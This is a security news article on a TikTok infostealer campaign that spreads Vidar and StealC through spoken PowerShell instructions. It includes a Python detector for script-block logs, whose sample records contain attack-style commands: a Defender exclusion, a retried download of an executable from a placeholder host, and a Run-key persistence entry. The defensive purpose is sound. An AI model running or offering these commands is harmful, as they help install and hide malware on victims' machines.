A newly identified infostealer malware campaign uses TikTok and its extensive user base to spread Vidar and StealC.
According to reports, this campaign departs from conventional malicious strategies. Instead of relying on compromised websites or email attachments, attackers leverage the platform’s vast reach and user trust to distribute harmful software disguised as innocuous video content.
Moreover, the attackers employ short-form videos—reportedly generated with AI tools—to guide viewers in executing PowerShell commands.
These commands are presented as workarounds for activating popular software such as Microsoft Office or Spotify, and running them starts the infection. What sets this tactic apart is that the commands are conveyed only through spoken instructions and on-screen visuals; they never appear as text or as embedded links, so there is no URL or script body for conventional content scanning to inspect.
Because the platform's security measures have nothing textual to flag, viewers are deceived into typing the commands manually and inadvertently installing the malware themselves.
The infostealer malware campaign was attributed to several TikTok accounts.
Investigations revealed that the infostealer malware campaign used multiple TikTok accounts, including @/gitallowed, @/zane.houghton, and @/digitaldreams771.
Though these accounts are inactive, they previously shared similar AI-voiced videos with only slight differences in presentation and payload delivery, indicating a potential use of automation in their creation.
The infection chain begins when the user executes a PowerShell command that downloads a script from allaivo[.]me. This script then retrieves and installs either Vidar or StealC.
The PowerShell script is designed to evade detection and ensure successful deployment. It hides files within user directories and includes them in the Windows Defender exclusion list, minimising the risk of detection.
It also downloads the malware from a secondary domain and incorporates retry logic to guarantee execution even if initial attempts fail.
To maintain persistence and avoid forensic detection, the script sets up mechanisms to allow the malware to persist through system reboots and erase traces of its existence.
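The script behaviour described above (staging under the user profile, Defender exclusion tampering, a retried download, reboot persistence) leaves footprints in PowerShell Script Block Logging. The detector below is an added example, not code from the reports or the campaign: it correlates those indicators per PowerShell session over constructed log records (Event ID 4104 style text with a placeholder domain) and flags a session only when an exclusion change is paired with a download or persistence step, since an exclusion alone is routine administrative noise. The regexes are heuristic assumptions, not signatures taken from the campaign.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Heuristic patterns for the behaviours described in the article (assumptions).
INDICATORS: Dict[str, re.Pattern] = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "user_dir_staging": re.compile(r"\$env:(?:APPDATA|LOCALAPPDATA|TEMP|USERPROFILE)", re.I),
    "remote_download": re.compile(r"Invoke-WebRequest|DownloadFile|DownloadString|Start-BitsTransfer", re.I),
    "retry_loop": re.compile(r"\b(?:for|while|do)\b.*?\btry\b", re.I | re.S),
    "persistence": re.compile(r"CurrentVersion\\Run|Register-ScheduledTask|schtasks", re.I),
}

# Constructed sample records: (session id, script block text). The domain is a placeholder.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("sess-A", 'Add-MpPreference -ExclusionPath "C:\\BuildAgent\\work"'),  # benign admin task
    ("sess-B", '$d = "$env:APPDATA\\svc"; Add-MpPreference -ExclusionPath $d'),
    ("sess-B", 'for ($i=0; $i -lt 5; $i++) { try { Invoke-WebRequest -Uri '
               'https://PLACEHOLDER.invalid/p -OutFile "$d\\a.exe"; break } catch {} }'),
    ("sess-B", 'Set-ItemProperty HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run '
               '-Name svc -Value "$d\\a.exe"'),
    ("sess-C", 'Invoke-WebRequest -Uri https://updates.example.invalid/ver.txt'),  # benign
]


def indicators_for(text: str) -> Set[str]:
    """Return the names of all indicator patterns matched by one script block."""
    return {name for name, pat in INDICATORS.items() if pat.search(text)}


def score_sessions(events: List[Tuple[str, str]]) -> Dict[str, dict]:
    """Correlate indicators across every script block of a session.

    A session is suspicious when it tampers with Defender exclusions AND also
    downloads, retries, or persists; an exclusion by itself is not flagged.
    """
    hits: Dict[str, Set[str]] = defaultdict(set)
    for session, text in events:
        hits[session] |= indicators_for(text)
    verdicts: Dict[str, dict] = {}
    for session, found in hits.items():
        paired = found & {"remote_download", "retry_loop", "persistence"}
        verdicts[session] = {
            "indicators": sorted(found),
            "suspicious": "defender_exclusion" in found and bool(paired),
        }
    return verdicts


if __name__ == "__main__":
    for session, v in score_sessions(SAMPLE_EVENTS).items():
        print(session, "SUSPICIOUS" if v["suspicious"] else "ok", v["indicators"])
```

In a real deployment the session id would come from the 4104 record's activity/correlation id and the benign-exclusion baseline would be tuned per environment.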
Vidar further conceals its command-and-control (C2) infrastructure by hosting its C2 addresses on legitimate platforms such as Steam and Telegram, so the malware's initial lookups blend in with ordinary traffic to those services and escape detection by standard network security tools.
Cybersecurity experts regard this campaign as a warning for organisations to update their security strategies. Traditional detection methods fail to recognise threats disseminated via social media, especially those camouflaged by AI-generated content and social engineering.
Organisations are encouraged to enhance user education programs, including training on identifying and reporting misleading video content.
